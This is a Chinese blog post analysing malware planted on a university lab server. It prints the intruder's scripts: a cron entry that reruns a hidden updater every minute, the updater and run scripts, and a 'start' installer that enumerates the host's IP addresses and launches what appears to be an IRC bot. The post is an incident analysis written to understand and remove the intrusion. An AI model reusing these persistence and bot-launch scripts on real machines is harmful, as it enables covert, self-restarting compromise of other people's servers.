December 6th, 2010

实验室服务器被黑记(下)

  本来这篇文章写的差不多了,后来一直忙,存成草稿没有发,直到最近才想起这回事来。简单分析了一下被植入的脚本,才学疏浅,有误的地方请同学们多指教。

  让我们先来看一下植入脚本的文件结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
root@delleon:~/tmp# find . -printf '%y %p\n'
d .
d ./conect1
f ./conect1/autorun
f ./conect1/run
f ./conect1/bash
f ./conect1/LinkEvents
f ./conect1/start
f ./conect1/inst
d ./conect1/r
f ./conect1/r/raway.e
f ./conect1/r/rnicks.e
f ./conect1/r/rversions.e
f ./conect1/r/rkicks.e
f ./conect1/r/rsignoff.e
f ./conect1/r/rtsay.e
f ./conect1/r/rpickup.e
f ./conect1/r/rsay.e
f ./conect1/r/rinsult.e
d ./conect2
f ./conect2/m.pid
f ./conect2/autorun
f ./conect2/m.lev
f ./conect2/run
f ./conect2/alongi.seen
f ./conect2/.192.168.1.98.user.swp
f ./conect2/vhosts
f ./conect2/bash
f ./conect2/m.set
f ./conect2/LinkEvents
f ./conect2/xey.seen
f ./conect2/cron.d
f ./conect2/start
f ./conect2/m.ses
f ./conect2/inst
f ./conect2/update
f ./conect2/192.168.1.98.user
f ./conect2/192.168.1.98.user2
f ./conect2/mech.dir
d ./conect2/r
f ./conect2/r/raway.e
f ./conect2/r/rnicks.e
f ./conect2/r/rversions.e
f ./conect2/r/rkicks.e
f ./conect2/r/rsignoff.e
f ./conect2/r/rtsay.e
f ./conect2/r/rpickup.e
f ./conect2/r/rsay.e
f ./conect2/r/rinsult.e
d ./conect3
f ./conect3/autorun
f ./conect3/run
f ./conect3/bash
f ./conect3/LinkEvents
f ./conect3/start
f ./conect3/inst
d ./conect3/r
f ./conect3/r/raway.e
f ./conect3/r/rnicks.e
f ./conect3/r/rversions.e
f ./conect3/r/rkicks.e
f ./conect3/r/rsignoff.e
f ./conect3/r/rtsay.e
f ./conect3/r/rpickup.e
f ./conect3/r/rsay.e
f ./conect3/r/rinsult.e

  经过对比发现,connect1、connect2、connect3目录中的autorun、bash、run、start文件以及r目录下都是完全一样的,inst和LinkEvents两个文件实现的功能也几乎一样。而connect2中的许多脚本都被加上了x可执行属性并且多出好几个文件,所以我们只拿connect2开刀即可。

  首先从crontab.d入手,正是它被加入了服务器的crontab中,使其每分钟执行一次update脚本。update脚本先检测是否存在m.pid文件来记录进程号,如有则干掉此进程,然后执行run脚本,run脚本则执行目录下的bash文件,bash文件是一个二进制文件。

1
2
root@delleon:~/tmp/conect2# cat cron.d 
* * * * * /usr/local/lib/.internet/conect2/update >/dev/null 2>&1
1
2
3
4
5
6
7
8
9
10
11
root@delleon:~/tmp/conect2# cat update 
#!/bin/sh
if test -r /usr/local/lib/.internet/conect2/m.pid; then
pid=$(cat /usr/local/lib/.internet/conect2/m.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /usr/local/lib/.internet/conect2
./run &>/dev/null
1
2
3
4
root@delleon:~/tmp/conect2# cat run 
#!/bin/sh
export PATH=.
bash

  这条路似乎走不通了,wait,我们漏掉其他几个脚本,start、autorun和run,我们来看看start脚本的内容:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
root@delleon:~/hack.connect/conect2# cat start
#!/bin/bash
 
if [ $# != 1 ]; then
        echo "=====>Multi mech startup mood by b-u-f-u<====="
        echo "++++++#conf --> *Mereu cu un pas inainte*  ++++++++"
        echo "Exemplu : ./start chann "
        echo "P.S : fara diez!"
        exit;
fi
 
 
/sbin/ifconfig | grep -v "inet6" |grep "inet" | tr ':' ' '| awk '{ print $3 }' |grep -v "127.0.0.1" > vhosts
nrs=`cat vhosts | grep -c .`
######variabile######
D=1
B=./vhosts
######install######
echo "=====>Multi mech startup mech mood by b-u-f-u<====="
echo "++++++#conf --> *Mereu cu un pas inainte*  ++++++++"
sleep 1
echo "Am gasit $nrs ip-uri"
sleep 1
 
while read line; do
   ./inst $1 $line
 
case "$D" in
"1")
echo -e "\b\.\c"
D=2
;;
"2")
echo -e "\b\..\c"
D=3
;;
"3")
echo -e "\b\...\c"
D=4
;;
"4")
echo -e "\b\....\c"
D=1
;;
esac
 done < $B
echo -e "\bGata"
./autorun
./run

  好了,其实是先执行的start脚本,然后把公网IP写入vhost文件,并赋值给$B和$D,下一步是安装过程,起一个循环,不断地执行inst脚本加刚才的IP参数,inst脚本则尝试登入m.set文件中所列IP和端口的IRC服务,为神马说是IRC呢,因为m.set中指定的端口都是IRC所使用的6667,到这里可能有点思路了,原来是偷偷登入IRC发垃圾消息?我们继续看,在start脚本最后,执行的是autorun和run脚本,autorun则是生成刚才的cron.d并加入crontab。好了,基本理清顺序了。  因为无法阅读二进制代码,最后也实在没法彻底分析这段黑客程序到底想要干什么,从蛛丝马迹来看,像是要开TCP6667的端口和IRC机器人,然后要做什么就不清楚了,估计是到IRC群组里发垃圾信息吧。

Related Posts:

Tags: , ,

  1. No comments yet.
  1. No trackbacks yet.